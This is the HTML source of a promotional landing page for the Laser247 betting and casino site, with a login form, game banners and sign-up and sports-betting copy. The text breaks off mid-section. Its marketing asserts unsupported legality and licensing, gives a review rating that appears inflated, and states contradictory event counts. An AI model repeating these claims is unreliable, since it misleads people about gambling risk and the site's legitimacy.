<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
    <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />
    <meta name="google-site-verification" content="1fuP7x8YLktvWF1YU0Qm5kk-59sAH87-NsPq4f0mVsU" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.0/css/all.min.css" integrity="sha512-9xKTRVabjVeZmc+GUW8GgSmcREDunMM+Dt/GrzchfN8tkwHizc5RP4Ok/MXFFy5rIjJjzhndFScTceq5e6GvVQ==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="stylesheet.css">
    <link rel="stylesheet" href="responsive.css">
    <link rel="canonical" href="https://lasers247.vip/" />
    <link rel="alternate" hreflang="en" href="https://lasers247.vip/">

  <title>Laser247 India - Login to Official Online Casino & Sports Betting Website</title>
  <meta name="title" content="Laser247 India - Login to Official Online Casino & Sports Betting Website" />
  <meta name="description" content="There is no doubt that Laser247 is the most popular betting, live casino, and fantasy gaming platform in India. A wide variety of sports games can be found on Laser247.vip every day. Log in to Laser247 now." />
  <meta name="keywords" content="laser247 owner, laser247.club apk, laser247, laser247 login, laser247.club, laser247 ID, welcome to laser247, laser247.com apk, laser247 apk download, laser247 login download, laser247 cricket ID, laser247 login ID, laser247.com login, laser247.online ID, laser247.online login, laser247.online apk, laser247.vip apk download, laser247.vip login ID" />

  <!-- Open Graph meta tags for Laser247 -->
  <meta property="og:title" content="Laser247 India - Login to Official Online Casino & Sports Betting Website" />
  <meta property="og:description" content="Laser247 is India's ultimate destination for thrilling sports betting, live casino action, and fantasy gaming! Daily more than 5000+ sports games available in Laser247.online website. Automatic deposit and withdrawal facilities, best betting odds, and 100% trusted and genuine. Login to Laser247 account today." />
  <meta property="og:keywords" content="laser247 owner, laser247.club apk, laser247, laser247 login, laser247.club, laser247 ID, welcome to laser247, laser247.com apk, laser247 apk download, laser247 login download, laser247 cricket ID, laser247 login ID, laser247.com login, laser247.online ID, laser247.online login, laser247.online apk, laser247.vip apk download, laser247.vip login ID" />
  <meta property="og:url" content="https://lasers247.vip/" />
  <meta property="og:image" content="https://lasers247.vip/assets/image/logo.gif" />
  <meta property="og:type" content="website" />

  <!-- Twitter Card meta tags for Laser247 -->
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:site" content="@laser247_games"> 
  <meta name="twitter:title" content="Laser247 India - Login to Official Online Casino & Sports Betting Website">
  <meta name="twitter:description" content="Laser247 is India's ultimate destination for thrilling sports betting, live casino action, and fantasy gaming! Daily more than 5000+ sports games available in Laser247.online website. Automatic deposit and withdrawal facilities, best betting odds, and 100% trusted and genuine. Login to Laser247 account today.">
  <meta name="twitter:keywords" content="laser247 owner, laser247.club apk, laser247, laser247 login, laser247.club, laser247 ID, welcome to laser247, laser247.com apk, laser247 apk download, laser247 login download, laser247 cricket ID, laser247 login ID, laser247.com login, laser247.online ID, laser247.online login, laser247.online apk, laser247.vip apk download, laser247.vip login ID">
  <meta name="twitter:image" content="https://x.com/Laser247_game/photo">
  <meta name="twitter:url" content="https://x.com/laser247_game">

  <meta name="DC.Title" content="Laser247 India - Login to Official Online Casino & Sports Betting Website">
  <meta name="DC.Creator" content="Laser247">
  <meta name="DC.Subject" content="laser247 owner, laser247.club apk, laser247, laser247 login, laser247.club, laser247 ID, welcome to laser247, laser247.com apk, laser247 apk download, laser247 login download, laser247 cricket ID, laser247 login ID, laser247.com login, laser247.online ID, laser247.online login, laser247.online apk, laser247.vip apk download, laser247.vip login ID">
  <meta name="DC.Description" content="Laser247 is India's ultimate destination for thrilling sports betting, live casino action, and fantasy gaming! Daily more than 5000+ sports games available in Laser247.online website. Automatic deposit and withdrawal facilities, best betting odds, and 100% trusted and genuine. Login to Laser247 account today.">
  <meta name="DC.Publisher" content="Laser247">
  <meta name="DC.Contributor" content="Laser247 Marketing Team">
  <meta name="DC.Date" content="2024-11-21">
  <meta name="DC.Type" content="Website">
  <meta name="DC.Format" content="text/html">
  <meta name="DC.Identifier" content="https://lasers247.vip/">
  <meta name="DC.Language" content="en">
  <meta name="DC.Coverage" content="India">
  <meta name="DC.Rights" content="Copyright @2024 Laser247. All rights reserved.">

<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "WebSite",
  "url": "https://lasers247.vip/",
  "name": "Laser247",
  "description": "Laser247 is India’s leading platform for online sports betting, live casino games, and fantasy sports. With over 1500+ sports events available daily, Laser247 offers a dynamic and thrilling gaming experience. Log in to your Laser247 account today and start playing.",
  "publisher": {
    "@type": "Organization",
    "name": "Laser247",
    "url": "https://lasers247.vip/"
  },
  "sameAs": [
    "https://www.instagram.com/lasersbook247/",
    "https://x.com/laser247_game"
  ],
  "mainEntityOfPage": "https://lasers247.vip/",
  "keywords": "laser247 owner, laser247.club apk, laser247, laser247 login, laser247.club, laser247 ID, welcome to laser247, laser247.com apk, laser247 apk download, laser247 login download, laser247 cricket ID, laser247 login ID, laser247.com login, laser247.online ID, laser247.online login, laser247.online apk, laser247.vip apk download, laser247.vip login ID",
  "potentialAction": {
    "@type": "SearchAction",
    "target": "https://lasers247.vip/search?q={search_term_string}",
    "query-input": "required name=search_term_string"
  }
}
</script>

<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "SportsOrganization",
  "name": "Laser247",
  "url": "https://lasers247.vip/",
  "logo": "https://lasers247.vip/assets/image/logo.gif",
  "description": "Laser247 is India's premier platform for sports betting, live casino games, and fantasy sports. With over 5000 sports events available daily, the site offers automatic deposit and withdrawal options, the best betting odds, and a 100% trusted and secure experience. Join Laser247 today for exciting betting and gaming opportunities.",
  "sport": "Cricket",
  "foundingDate": "2018",
  "founders": {
    "@type": "Person",
    "name": "Laser247"
  },
  "contactPoint": {
    "@type": "ContactPoint",
    "contactType": "Customer Support",
    "telephone": "+91-7296860023",
    "email": "support@laser247.com",
    "areaServed": "IN",
    "availableLanguage": "English"
  }
}
</script>

<script type="application/ld+json">
{
  "@context": "https://schema.org/",
  "@type": "BreadcrumbList",
  "itemListElement": [
    {
      "@type": "ListItem",
      "position": 1,
      "name": "Welcome to Laser247",
      "item": "https://lasers247.vip/"
    },
    {
      "@type": "ListItem",
      "position": 2,
      "name": "Login - Laser247 Official Website",
      "item": "https://lasers247.vip/login"
    }
  ]
}
</script>

<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "Product",
  "name": "Laser247",
  "description": "Laser247 is India's premier online platform for thrilling sports betting, live casino games, and fantasy gaming. With over 5000 sports events daily, Laser247 offers a seamless gaming experience with automatic deposit and withdrawal facilities, competitive odds, and 100% trustworthiness. Join Laser247 today and explore exciting gaming opportunities.",
  "aggregateRating": {
    "@type": "AggregateRating",
    "ratingValue": "4.9",
    "reviewCount": "98254"
  },
  "review": [
    {
      "@type": "Review",
      "author": {
        "@type": "Person",
        "name": "Rahul Singh"
      },
      "reviewRating": {
        "@type": "Rating",
        "ratingValue": "5",
        "bestRating": "5"
      },
      "datePublished": "2024-09-21",
      "reviewBody": "Laser247 provides an excellent online sports betting and casino gaming experience. The interface is user-friendly, and the site loads smoothly. It offers a wide variety of games and betting options, with responsive customer support. The platform could enhance its payment flexibility by adding more payment options."
    },
    {
      "@type": "Review",
      "author": {
        "@type": "Person",
        "name": "Raj Kumar"
      },
      "reviewRating": {
        "@type": "Rating",
        "ratingValue": "4.7",
        "bestRating": "5"
      },
      "datePublished": "2024-09-18",
      "reviewBody": "Laser247 is an engaging and well-designed platform for online sports betting and casino games. The interface is sleek, and the site loads quickly. It offers a broad range of gaming options and betting opportunities, catering to various preferences. Customer support is excellent, but the platform could improve by introducing more payment methods."
    }
  ]
}
</script>

<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "FAQPage",
  "mainEntity": [{
    "@type": "Question",
    "name": "Is Laser247 Legal in India?",
    "acceptedAnswer": {
      "@type": "Answer",
      "text": "Yes, Laser247 is a legitimate and licensed online gaming platform in India. It follows all the necessary laws and regulations and operates under licenses from trusted authorities, ensuring a safe and fair betting experience for users."
    }
  },{
    "@type": "Question",
    "name": "What Sports Can I Bet on with Laser247?",
    "acceptedAnswer": {
      "@type": "Answer",
      "text": "Laser247 offers a variety of sports for betting, including cricket, football, basketball, tennis, and many more. You can explore multiple betting options and enjoy wagering on popular leagues and tournaments worldwide."
    }
  },{
    "@type": "Question",
    "name": "How Do I Deposit or Withdraw Money on Laser247?",
    "acceptedAnswer": {
      "@type": "Answer",
      "text": "Depositing and withdrawing funds is simple with Laser247. We provide secure options like credit and debit cards, bank transfers, and e-wallets. Log in, click the deposit or withdrawal option, select your preferred method, and follow the steps to complete the process."
    }
  },{
    "@type": "Question",
    "name": "Is My Information Safe on Laser247?",
    "acceptedAnswer": {
      "@type": "Answer",
      "text": "Absolutely; Your privacy and security are our priority. Laser247 uses top-notch encryption technology to protect your personal and financial data, ensuring that your details remain private and secure."
    }
  },{
    "@type": "Question",
    "name": "What Bonuses and Promotions Does Laser247 Offer?",
    "acceptedAnswer": {
      "@type": "Answer",
      "text": "Laser247 provides a range of exciting promotions and bonuses, such as welcome offers for new users, free bets, and cashback deals. Check the Promotions section regularly to make the most of these rewards."
    }
  },{
    "@type": "Question",
    "name": "How Do I Use the Live Betting Feature on Laser247?",
    "acceptedAnswer": {
      "@type": "Answer",
      "text": "You can enjoy live betting on Laser247 during ongoing matches. Head to the live betting section on our platform, select the event you want to bet on, and place your wagers while the game unfolds."
    }
  },{
    "@type": "Question",
    "name": "How Can I Reach the Laser247 Support Team?",
    "acceptedAnswer": {
      "@type": "Answer",
      "text": "Our customer support team is available to assist you at any time. You can contact us through email, phone, or live chat for quick and reliable support."
    }
  },{
    "@type": "Question",
    "name": "Does Laser247 Offer Responsible Gaming Tools?",
    "acceptedAnswer": {
      "@type": "Answer",
      "text": "Yes, Laser247 promotes responsible gaming by offering features like deposit limits and self-exclusion options. We also provide access to resources and organizations that support safe gambling practices."
    }
  },{
    "@type": "Question",
    "name": "Can I Use Laser247 on My Mobile Phone?",
    "acceptedAnswer": {
      "@type": "Answer",
      "text": "Absolutely, Laser247 is mobile-friendly, allowing you to enjoy sports betting and casino games on your smartphone or tablet. You can access the platform via our website or download the app for added convenience."
    }
  }]
}
</script>	

     <!-- Favicons -->
    <link rel="shortcut icon" type="image/jpg" href="assets/image/favicon.ico" />

    <!-- bootstrap link -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.bundle.min.js"></script>

    <!-- jQuery link -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

    <!-- Option 1: Include in HTML -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.3.0/font/bootstrap-icons.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
    
</head>

<body>

<div class="mainContainerHeadOut">
<div class="header">
    <div class="logoSide">
        <img src="assets/image/logo.gif" alt="Laser247">
    </div>
    <div class="otherHeadSide">
        <div id="userpass">
            <span><i class="fa fa-user" aria-hidden="true"></i></span>
            <input type="text" id="username" name="username" placeholder="Username">
            <input type="text" id="password" password="password" placeholder="Password">
            <button id="LoginDeskButton" >Login <i class="fa fa-arrow-right" aria-hidden="true"></i></button>
            <button >Login With Demo ID <i class="fa fa-arrow-right" aria-hidden="true"></i></button>
        </div>
        <div id="withcode">
            <input type="text" id="withdrawal" placeholder="Withdrawal Code">
            <button id="loginFinal">Login <i class="fa fa-arrow-right" aria-hidden="true"></i></button>
        </div>
        <p id="ERRORSHOW"></p>
    </div>
    <div class="buttonMobile">
        <button onclick="window.location.href='index.html'">Demo</button>
        <button onclick="window.location.href='login.html'"  class="loginButton"><i class="fa fa-user" aria-hidden="true"></i> Login</button>
    </div>
</div>
<div class="navigationSection"> 
    <ul class="list-inline">
        <li class="list-inline-item"><a href="#">Home</a></li>
        <li class="list-inline-item"><a href="#">In-Play</a></li>
        <li class="list-inline-item"><a href="#">Cricket</a></li>
        <li class="list-inline-item"><a href="#">Tennis</a></li>
        <li class="list-inline-item"><a href="#">Football</a></li>
        <li class="list-inline-item"><a href="#">Hourse Racing</a></li>
        <li class="list-inline-item"><a href="#">Politics</a></li>
        <li class="list-inline-item"><a href="#">Greyhound  Racing</a></li>
        <li class="list-inline-item"><a href="#">Binary</a></li>
        <li class="list-inline-item"><a href="#">Kabaddi</a></li>
        <li class="list-inline-item"><a href="#">Casino</a></li>
        <li class="list-inline-item"><a href="#">Int Casino</a></li>
        <li class="list-inline-item fullred" ><a href="#">Sport Book</a></li>
        <li class="list-inline-item"><a href="#">Mixed Matrix Arts</a></li>
        <li class="list-inline-item"><a href="#">Vollyball</a></li>
        <li class="list-inline-item"><a href="#">Ice Hockey</a></li>
        <li class="list-inline-item"><a href="#">Basketball</a></li>
        <li class="list-inline-item"><a href="#">baseball</a></li>
        <li class="list-inline-item"><a href="#">Darts</a></li>
        <li class="list-inline-item"><a href="#">Futsal</a></li>
        <li class="list-inline-item"><a href="#">Table Tennis</a></li>
        <li class="list-inline-item"><a href="#">Rugby</a></li>
    </ul>
</div>
</div>

<div class="newsContainer">
    <div class="container">
        <div class="iconHeading">
        <i class="fa fa-microphone" aria-hidden="true"></i> News
        </div>
        <div class="newsSection">

        </div>
    </div>
</div>

<div class="imgSectionContainerMain">
    <div class="container">
        <div class="row">

            <div class="col-lg-12 col-md-12 col-sm-12">
                <img src="assets/image/slider1.webp" alt="Laser247">
            </div>

            <div class="col-lg-6 col-md-6 col-sm-6 col-6">
                <img src="assets/image/banner-sport1.webp" alt="Laser247">
            </div>
            <div class="col-lg-6 col-md-6 col-sm-6 col-6">
                <img src="assets/image/sportbook.webp" alt="Laser247">
            </div>

            <div class="col-lg-6 col-md-6 col-sm-12 col-6">
                <img src="assets/image/aviator-banner.webp" alt="Laser247">
                <h3>Aviator</h3>
            </div>
            <div class="col-lg-6 col-md-6 col-sm-12 col-6">
                <img src="assets/image/mac88-730_280.webp" alt="Laser247">
                <h3>MAC88</h3>
            </div>

            <div class="col-lg-12 col-md-12 col-sm-12">
                <img src="assets/image/fungames_1920x500.webp" alt="Laser247">
                <h3>Fun Games</h3>
            </div>

            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/dragontiger.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/dragontigeroneday.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/20-20poker.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/onedayteenpatti.webp" alt="Laser247">
            </div>


            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/bollywoodcasino.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/poker.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/baccarat.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/sicbo.webp" alt="Laser247">
            </div>

            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/roulette.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/superover.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/fivecricket.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/lucky7.webp" alt="Laser247">
            </div>


            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/andarbahar.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/2020teenpatti.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/2cardonedayteenpatti.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/muflisteenpatti.webp" alt="Laser247">
            </div>


            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/teenpattitest.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/32cards.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/queenrace.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/worlimatka.webp" alt="Laser247">
            </div>

            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/race20.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/dragontigerlion.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/amarakbaranthony.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/2cardsteenpatti.webp" alt="Laser247">
            </div>

            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/3cardjudgement.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/trio.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/lottery.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/1-card-20-20.webp" alt="Laser247">
            </div>

            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/1-card-meter.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/one-card-one-day.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/note-umber.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/kaun-banega-crorepati.webp" alt="Laser247">
            </div>

            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/raceto2nd.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/ludot20cricket.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/trio.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/bollywoodcasino.webp" alt="Laser247">
            </div>


            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/aaa.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/queenrace.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/kingrace.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/worlimatka.webp" alt="Laser247">
            </div>

            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/lucky7.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/dragontigerlion.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/dragontiger(1).webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/muflisteenpatti(1).webp" alt="Laser247">
            </div>

            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/teenpatti.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/2cardteenpatti.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/poker.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/highcard.webp" alt="Laser247">
            </div>


            <div class="col-lg-6 col-md-6 col-sm-6 col-6">
                <img src="assets/image/livecasino.webp" alt="Laser247">
            </div>
            <div class="col-lg-6 col-md-6 col-sm-6 col-6">
                <img src="assets/image/intcasino.webp" alt="Laser247">
            </div>


            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/aesexy.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/playtech-500-299.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/monopoly.webp" alt="Laser247">
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/dreamcatcher.webp" alt="Laser247">
            </div>


            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/coin-toss.webp" alt="Laser247">
                <h3>Coin Toss</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/rummy.webp" alt="Laser247">
                <h3>Rummy</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/roulette (1).webp" alt="Laser247">
                <h3>Roulette</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/blackjack.webp" alt="Laser247">
                <h3>Blackjack</h3>
            </div>

            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/baccarat(1).webp" alt="Laser247">
                <h3>Vaccarat</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/sicbo(1).webp" alt="Laser247">
                <h3>Sicbo</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/inc5.webp" alt="Laser247">
                <h3>Ezugi</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/cricketx.webp" alt="Laser247">
                <h3>CricketX</h3>
            </div>


            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/gmx_wonhundred.webp" alt="Laser247">
                <h3>Won Hundred</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/pilot.webp" alt="Laser247">
                <h3>Pilot</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/mines.webp" alt="Laser247">
                <h3>Mines</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/spinx.webp" alt="Laser247">
                <h3>SpinX</h3>
            </div>

            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/footballx.webp" alt="Laser247">
                <h3>Footballx</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/sms-jetex.webp" alt="Laser247">
                <h3>JetX</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/balloon.webp" alt="Laser247">
                <h3>Balloon</h3>
            </div>
            <div class="col-lg-3 col-md-3 col-sm-6 col-6">
                <img src="assets/image/vikings.webp" alt="Laser247">
                <h3>Viking's Strory</h3>
            </div>


            <div class="col-lg-6 col-md-6 col-sm-6 col-6">
                <img src="assets/image/horseracing.webp" alt="Laser247">
                <h3>Horse Racing</h3>
            </div>
            <div class="col-lg-6 col-md-6 col-sm-6 col-6">
                <img src="assets/image/greyhoundracing.webp" alt="Laser247">
                <h3>Greyhound Racing</h3>
            </div>

        </div>
    </div>
</div>

<div class="contentSectionContainerMain">
    <div class="container">
        <div class="row">
        <div class="section-one">
		<h1 class="heading-title">India's Reliable Legal Sports and Casino Website: Welcome to Laser247</h1>
		<p>One of the most well-known online bookmakers in India, Laser247.vip, provides a variety of betting alternatives for casino and sports enthusiasts. The site has quickly gained recognition in the competitive online betting market thanks to its user-friendly design, secure environment, and extensive selection of games. Laser247 was founded with the intention of creating a safe and enjoyable betting environment. It has since built a solid reputation for providing a large selection of betting choices with aggressive odds. </p>
		<p>The Laser247 link will appeal to and engage users who are searching for a single platform where they can gamble on sports and play casino games. It provides a range of betting options for popular sports like tennis, football, and cricket in addition to casino games including poker, slots, and live casino activities. Because of its tenacity and transparency, the website has expanded rapidly and is today a well-liked destination for lovers. </p>
		<p>One of Laser247's main differentiators is its commitment to security and moral gaming. With Laser247's fully licensed platform, state-of-the-art encryption technology, and a variety of responsible gambling choices, users can wager in a safe and controlled atmosphere.</p>		     
		<h2 class="heading-title">Registering for Laser247.vip</h2>
		<p>After completing the quick and simple Laser247 sign-up process, you may begin betting in a matter of minutes. The following is a breakdown of the registration steps:</p>
		<ol>
			<li>
				<strong>Visit the Website or App:</strong> To get started, download the Laser247 app to your smartphone or visit the official Laser247.vip website.  
			</li>
			<li>
				<strong>Click on ‘Sign Up’:</strong> Find and click the "Sign Up" button in the top right corner of the page after you've arrived at the website. This will direct you to the registration page.  
			</li>
			<li>
				<strong>Fill in Personal Information:</strong> This form requires your full name, birthdate, phone number, and email address. Laser247 may use this information to verify your identification and ensure that the website conforms with local gaming age regulations. 
			</li>
			<li>
				<strong>Create a Username and Password:</strong> Choose a unique username and a strong password for your account. Selecting a strong password is essential to enhancing account security. 
			</li>
			<li>
				<strong>Agree to the Terms and Conditions:</strong> Before you may proceed, you must agree to the terms and conditions, privacy statement, and responsible gaming policies of Laser247. These documents outline the platform's policies, practices, and user rights.  
			</li>
			<li>
				<strong>Email Verification:</strong> Laser247 will send a verification link to the email address you provided. Click the link to complete the registration process and verify your account. 
			</li>
			<li>
				<strong>KYC Process:</strong> According to Indian law, users must complete the KYC (Know Your Customer) process before they can make withdrawals. You must have a valid government-issued ID together with a recent utility or bank statement to prove your identity and address.
			</li>
		</ol>
		<p>Once your account has been validated, you may start depositing money and placing bets on your favorite casino or sporting events. Modern encryption technology protects all personal information during the easy and safe sign-up process.</p>
		</div>
		
		<div class="section-two">
		<h2 class="heading-title">Sports Betting: Welcome to Laser247</h2>
		<p>One of Laser247's primary attractions is its sizable sports betting section. Sports fans can wager on several popular sports with competitive odds and a variety of betting markets. This is a detailed examination of the options for sports betting that Laser247 offers: </p>
		<h2 class="heading-title nbs">Popular Sports:</h2>
		<div class="image-box-wrapper">
		<div class="imageRow left">
			<div class="image-box-img">
			<img src="assets/image/portrait-person-playing-cricket-sport.jpg" alt="Cricket" class="img-responsive">
			</div>
			<div class="image-box-content">
			<h3 class="heading-title">Cricket</h3>
			<p>Given how popular cricket is in India, it should not be surprising that one of Laser247's most popular services is cricket betting. Users can place wagers on domestic events, international matches, and Twenty20 contests like the Indian Premier League (IPL). </p>
			</div>
		</div>
		
		<div class="imageRow right">			
			<div class="image-box-content">
			<h3 class="heading-title">Football</h3>
			<p>The English Premier League, La Liga, the UEFA Champions League, and the FIFA World Cup are just a few of the leagues and competitions on which football fans can wager. </p>
			</div>
			<div class="image-box-img">
			<img src="assets/image/soccer-player-field-with-ball.jpg" alt="Football" class="img-responsive">
			</div>
		</div>
		
		<div class="imageRow left">
			<div class="image-box-img">
			<img src="assets/image/front-view-couple-tennis-court-2048x1365.jpg" alt="Tennis" class="img-responsive">
			</div>
			<div class="image-box-content">
			<h3 class="heading-title">Tennis</h3>
			<p>Laser247 offers a variety of tennis betting markets, such as the Grand Slams (Australian Open, US Open, French Open, Wimbledon), ATP and WTA tournaments, and more. </p>
			</div>
		</div>
		
		<div class="imageRow right">			
			<div class="image-box-content">
			<h3 class="heading-title">Basketball, Kabaddi, and More</h3>
			<p>By covering not only cricket, football, and tennis but also basketball, kabaddi, horse racing, and esports, the website gives gamers a wide range of betting alternatives. </p>
			</div>
			<div class="image-box-img">
			<img src="assets/image/group-young-people-roulette-table-casino-black-background-3-2048x1365.jpg" alt="Basketball, Kabaddi, and More" class="img-responsive">
			</div>
		</div>
		</div>
		</div>

		<div class="section-three">
			<h2 class="heading-title text-center">Types of Bet Options</h2>
			<div class="four-col-wrap">
			<div class="row">
				<div class="col-sm-3">
				<div class="box">
				<div class="image"><img src="assets/image/link.png" alt="Pre-Match Betting" class="img-responsive"></div>
				<h4 class="box-title">Pre-Match Betting</h4>
				<p>This type of betting, in which bets are placed before a game or event begins, is the most common. Laser247 provides a variety of betting markets for pre-match betting, including match winners, player-specific wagers, and over/under bets. </p>
				</div>
				</div>
				<div class="col-sm-3">
				<div class="box">
				<div class="image"><img src="assets/image/searching.png" alt="Live/In-Play Betting" class="img-responsive"></div>
				<h4 class="box-title">Live/In-Play Betting</h4>
				<p>Live betting, sometimes known as in-play betting, allows users to place wagers while the event is taking place. Those who want to make quick decisions based on action in real time might find this dynamic betting technique to be quite exciting. </p>
				</div>
				</div>
				<div class="col-sm-3">
				<div class="box">
				<div class="image"><img src="assets/image/wealth-accumulation.png" alt="Accumulator Bets" class="img-responsive"></div>
				<h4 class="box-title">Accumulator Bets</h4>
